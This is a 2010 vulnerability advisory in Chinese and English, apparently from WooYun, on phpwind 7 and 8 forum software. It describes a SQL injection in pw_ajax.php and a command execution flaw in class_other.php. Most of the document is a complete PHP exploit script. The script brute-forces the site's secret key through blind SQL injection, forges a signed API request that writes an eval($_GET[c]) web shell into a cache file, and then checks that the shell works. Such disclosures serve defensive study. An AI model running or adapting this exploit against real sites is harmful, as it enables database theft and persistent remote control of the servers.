phpwind多个远程代码执行漏洞(phpwind multiple sql injection vulnerability)转发布时间:2010-09-05 更新时间:2010-09-06 严重程度:中 威胁程度:控制应用程序系统 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 phpwind 7详细描述 phpwind 7和8版本存在输入验证漏洞,攻击者成功利用该漏洞可以远程执行任意php代码。 问题存在于pw_ajax.php中,由于用户提交给fieldname参数的数据缺少充分的过滤,攻击者可利用漏洞进行SQL注入攻击获取任何数据库里的数据。 另外class_other.php中存在一个任意命令执行的漏洞,由于对$class[cid]输入缺少充分过滤,不过进入此逻辑需要一些较为关键的key,借助上面的注射漏洞即可获得该key。 PHPWind has a sql injection vulnerability, which can be exploited by malicious people to conduct SQL injection attacks. Input passed to the "fieldname" Parameter in pw_ajax.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. In addition Input passed to the "$class[cid]" Parameter in class_other.php is not properly sanitised before being used in a SQL query. But in order to reach this logic code need some important key, attacker could exploit above sql injection vulnerability to get key . 测试代码 <?php echo " Info: Poc for Phpwind远程命令执行 Test: exploit.php user password http://www.wooyun.org/phpwind/ "; if($argc<3){ echo "\r\n参数缺少\r\n"; die(); } $user=$argv[1]; $pass=$argv[2]; $pwurl=$argv[3]; $myheader=array( 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language: zh-cn,zh;q=0.5', 'Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7', 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8', 'Referer: http://www.wooyun.org/', 'Connection: Keep-Alive', 'Cache-Control: no-cache', 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)' ); $cookie=""; $str=curlsend("$pwurl/login.php?","POST",0,$myheader,"forward=&jumpurl=http%3A%2F%2F127.0.0.1%2FPHPWind/upload%2F&step=2&lgt=0&pwuser=$user&pwpwd=$pass&hideid=0&cktime=31536000&submit=%B5%C7%C2%BC",1); preg_match_all("/Set-Cookie:([^;]+)/is",$str,$array); for($i=0;$i<count($array[1]);$i++){ $cookie=$cookie.";".$array[1][$i]; } //echo $cookie; $test = curlsend('$pwurl/pw_ajax.php',"POST",0,$myheader,'',1); if(strpos($test,'<ajax>')) { die('用户密码或者其他参数错误'); } $shellcode="action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e;%23"; $hash="0123456789abcdef"; $craked=""; for($i=0;$i<32;$i++){ for($n=0;$n<16;$n++){ $tmp=str_replace("{offset}",bin2hex($craked.$hash[$n]),$shellcode); $tmp=curlsend("$pwurl/pw_ajax.php","POST",0,$myheader,$tmp,0); if(strpos($tmp,"pw_config")){ echo "CrackEd Offset ".($i+1)." :".$hash[$n]."\r\n"; $craked=$craked.$hash[$n]; break; } } } echo "Craked Magicdata :".$craked."\r\n"; echo "Get shell :"; //another 0day $arg=''; $hack = array(); $hack['mode'] = 'Other'; $hack['method'] = 'threadscateGory'; $hack['params'] = 'a:1:{s:3:"cid";a:1:{s:3:"cid";a:1:{s:3:"cid";s:21:"\'.eval($_GET[c]).\'abc";}}}'; $hack['type'] = 'app'; $hack = strips($hack); ksort($hack); reset($hack); foreach ($hack as $key => $value) { if ($value && $key != 'sig') { $arg .= "$key=$value&"; } } $arg.='sig='.md5($arg.$craked); echo file_get_contents("$pwurl/pw_api.php?".$arg); echo "OK\r\n"; $str=file_get_contents("$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;"); if(strpos($str,'wooyun')){ echo "Got shell :"."$pwurl/data/bbscache/info_class.php?c=phpinfo();"; echo "\r\nOver!"; } function strips($param) { if (is_array($param)) { foreach ($param as $key => $value) { $param[$key] = strips($value); } } else { $param = stripslashes($param); } return $param; } function curlsend($url,$method=false,$ssl=0,$myheader,$data='',$header=0){ global $cookie; $ch = curl_init(); $timeout = 0; // set to zero for no timeout curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_POST, $method); curl_setopt($ch,CURLOPT_HTTPHEADER,$myheader); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt ($ch, CURLOPT_COOKIE, $cookie); if($data){ curl_setopt ($ch, CURLOPT_POSTFIELDS,$data); } curl_setopt ($ch, CURLOPT_HEADER, $header); if($ssl){ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); } $handles = curl_exec($ch); curl_close($ch); //echo $handles; return $handles; } 解决方案 目前没有详细解决方案提供: http://www.phpwind.net 相关信息 http://www.wooyun.org/bug.php?action=view&id=417 结界师 |
